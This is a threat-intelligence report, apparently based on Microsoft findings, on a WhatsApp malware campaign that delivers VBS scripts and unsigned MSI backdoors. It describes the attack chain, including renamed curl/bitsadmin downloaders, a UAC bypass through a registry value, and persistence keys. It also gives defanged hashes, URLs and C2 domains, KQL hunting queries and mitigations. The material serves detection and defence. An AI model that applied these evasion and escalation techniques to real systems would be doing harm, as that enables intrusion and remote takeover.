WhatsApp Malware Campaign Delivering VBS Payloads and MSI Backdoors
Executive Summary
In late February 2026, Microsoft Defender Experts detected a sophisticated attack campaign leveraging WhatsApp to distribute malicious Visual Basic Script (VBS) files to Windows users. Once a victim executes the file, a multi-stage infection chain is triggered, ultimately granting the attacker full system control via MSI backdoors. What makes this campaign particularly notable is its combination of social engineering, Living-off-the-Land (LotL) techniques, and public cloud infrastructure to evade security solutions.
Threat Landscape
This campaign reflects a growing trend of abusing trusted communication platforms like WhatsApp to deliver malware. Rather than relying on traditional email phishing, attackers exploit the inherent trust users place in familiar messaging applications to lower their psychological defenses. Notably, the lure content used to convince victims to open the VBS file has not yet been identified.
Detailed Attack Chain
The campaign unfolds across four distinct stages, each building the foundation for the next:
Stage 1 — Initial Access via WhatsApp
A malicious VBS file is sent directly through a WhatsApp message. Upon execution, the script:
Creates a hidden directory at
C:\ProgramData\EDS8738Copies and renames legitimate Windows tools:
curl.exe→netapi.dll,bitsadmin.exe→sc.exeThe renamed files retain their original PE metadata (
OriginalFileName), creating a detectable anomaly for EDR solutions
Stage 2 — Cloud Payload Retrieval
Using the renamed binaries with downloader flags, the malware connects to reputable cloud services to fetch secondary payloads:
auxs.vbsandWinUpdate_KB5034231.vbsare hosted on AWS S3, Tencent Cloud, and Backblaze B2This technique makes malicious requests appear as normal system traffic, making it extremely difficult to distinguish from legitimate activity
Stage 3 — Privilege Escalation & Persistence
This is the most critical stage of the campaign:
The malware modifies the
ConsentPromptBehaviorAdminregistry value to disable UAC promptsIt repeatedly attempts to launch
cmd.exewith elevated privileges, looping until successful or forcibly interruptedPersistence is written to
HKLM\Software\Microsoft\Winto survive rebootsThe entire privilege escalation process occurs without any user interaction
Stage 4 — Final Backdoor Deployment
The final stage installs MSI packages that are not digitally signed:
| Filename | Description |
|---|---|
AnyDesk.msi |
Impersonates legitimate remote control software, establishes persistent access |
Setup.msi |
Generic backdoor installer |
WinRAR.msi |
Impersonates a popular archiving tool |
LinkPoint.msi |
Additional backdoor installer |
Through the fake AnyDesk installation, the attacker achieves persistent remote access, enabling data exfiltration, additional malware deployment, or enrollment of the system into a botnet.
Technical Analysis
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Details |
|---|---|---|---|
| Initial Access | Phishing via Messaging Platform | T1566 | VBS delivered via WhatsApp |
| Execution | User Execution: Malicious File | T1204.002 | Victim manually executes VBS |
| Defense Evasion | Masquerading: Rename System Utilities | T1036.003 | curl.exe → netapi.dll |
| Defense Evasion | Abuse of Trusted Cloud Services | T1102 | AWS, Tencent, Backblaze |
| Privilege Escalation | Abuse Elevation Control: Bypass UAC | T1548.002 | Registry UAC bypass |
| Persistence | Registry Run Keys / Startup Folder | T1547.001 | HKLM registry modification |
| Command & Control | Remote Access Software | T1219 | AnyDesk backdoor |
Evasion Highlights
This campaign is particularly dangerous due to the simultaneous use of multiple evasion techniques. The combination of legitimate Windows binaries (LotL) with cloud hosting renders signature-based and domain reputation-based security solutions largely ineffective. Furthermore, delayed execution and staged delivery help bypass sandbox behavioral analysis systems.
Indicators of Compromise (IoCs)
SHA-256 Hashes — VBS Scripts (Initial Stage)
| Hash | Description |
|---|---|
a773bf0d400986f9bcd001c84f2e1a0b614c14d9088f3ba23ddc0c75539dc9e0 |
Initial VBS from WhatsApp |
22b82421363026940a565d4ffbb7ce4e7798cdc5f53dda9d3229eb8ef3e0289a |
Initial VBS from WhatsApp |
SHA-256 Hashes — VBS Droppers (Cloud Stage)
| Hash | Description |
|---|---|
91ec2ede66c7b4e6d4c8a25ffad4670d5fd7ff1a2d266528548950df2a8a927a |
Script from cloud storage |
1735fcb8989c99bc8b9741f2a7dbf9ab42b7855e8e9a395c21f11450c35ebb0c |
Script from cloud storage |
5cd4280b7b5a655b611702b574b0b48cd46d7729c9bbdfa907ca0afa55971662 |
Script from cloud storage |
630dfd5ab55b9f897b54c289941303eb9b0e07f58ca5e925a0fa40f12e752653 |
Script from cloud storage |
SHA-256 Hashes — MSI Installers (Final Payload)
| Hash | Description |
|---|---|
dc3b2db1608239387a36f6e19bba6816a39c93b6aa7329340343a2ab42ccd32d |
MSI installer |
a2b9e0887751c3d775adc547f6c76fea3b4a554793059c00082c1c38956badc8 |
MSI installer |
15a730d22f25f87a081bb2723393e6695d2aab38c0eafe9d7058e36f4f589220 |
MSI installer |
URLs — Cloud Payload Hosting
| URL | Service |
|---|---|
hxxps[:]//bafauac.s3.ap-southeast-1.amazonaws[.]com |
Amazon S3 |
hxxps[:]//yifubafu.s3.ap-southeast-1.amazonaws[.]com |
Amazon S3 |
hxxps[:]//9ding.s3.ap-southeast-1.amazonaws[.]com |
Amazon S3 |
hxxps[:]//f005.backblazeb2.com/file/bsbbmks |
Backblaze B2 |
hxxps[:]sinjiabo-1398259625[.]cos.ap-singapore.myqcloud.com |
Tencent Cloud |
C2 Domains
| Domain | Role |
|---|---|
Neescil[.]top |
Command & Control |
velthora[.]top |
Command & Control |
Hunting Queries (Microsoft Defender / KQL)
The following queries were provided by Microsoft to hunt for related activity:
Detect malicious VBS script execution:
DeviceProcessEvents
| where InitiatingProcessFileName has "wscript.exe"
| where InitiatingProcessCommandLine has_all ("wscript.exe",".vbs")
| where ProcessCommandLine has_all ("ProgramData","-K","-s","-L","-o", "https:")
Detect next-stage VBS payload retrieval:
DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".vbs"
Detect malicious MSI installer drop:
DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".msi"
Detect outbound C2 communication:
DeviceNetworkEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where InitiatingProcessCommandLine has_all ("-s","-L","-o", "-k")
Mitigation & Recommendations
Endpoint Controls
Restrict script hosts in untrusted paths:
wscript.exe,cscript.exe,mshta.exeMonitor renamed Windows binaries executing with anomalous flags, especially
curlandbitsadmindownloader flagsEnable EDR in block mode to neutralize malicious artifacts even when antivirus does not detect them
Network & Cloud Monitoring
Audit and filter outbound traffic to public cloud services (AWS S3, Tencent Cloud, Backblaze B2) in enterprise contexts
Block connections to known C2 domains:
Neescil[.]top,velthora[.]top
Persistence Detection
Continuously monitor registry changes at
HKLM\Software\Microsoft\WinAlert on modifications to
ConsentPromptBehaviorAdmin(indicator of UAC bypass)Flag MSI package installations that lack valid digital signatures
User Awareness
Train employees never to open attachments (especially
.vbs,.js,.bat) received via messaging platforms such as WhatsApp — even from known contactsEstablish a clear incident reporting process for suspicious messages or files received via any communication channel
Microsoft-Specific Recommendations
Enable cloud-delivered protection in Microsoft Defender Antivirus
Activate Tamper Protection combined with
DisableLocalAdminMergeEnable Attack Surface Reduction (ASR) rules to block LotL techniques
Microsoft Defender Detections
| Tactic | Observed Activity | Detection Name |
|---|---|---|
| Initial Access | Malicious VBS downloaded via WhatsApp | Trojan:VBS/Obfuse.KPP!MTB |
| Execution / Defense Evasion | Renaming curl.exe, bitsadmin.exe |
Suspicious curl behavior |
| Privilege Escalation | Reading UAC settings, modifying registry | Trojan:VBS/BypassUAC.PAA!MTB |
Analyst Assessment
This campaign demonstrates a high level of sophistication, integrating multiple evasion layers within a single, cohesive attack chain. The abuse of globally trusted cloud services (AWS, Tencent, Backblaze) reflects an emerging trend of "living off trusted services" — an evolution beyond traditional LotL techniques. While Microsoft has not publicly attributed this activity to a specific threat actor, the overall sophistication and use of AnyDesk as a persistent C2 mechanism strongly suggests this is the work of an organized APT group or professional cybercrime operation targeting enterprises. This campaign serves as a critical reminder that no platform is inherently safe, and enforcing a zero-trust policy toward all received files — regardless of the application used — is a non-negotiable requirement in today's enterprise security posture.
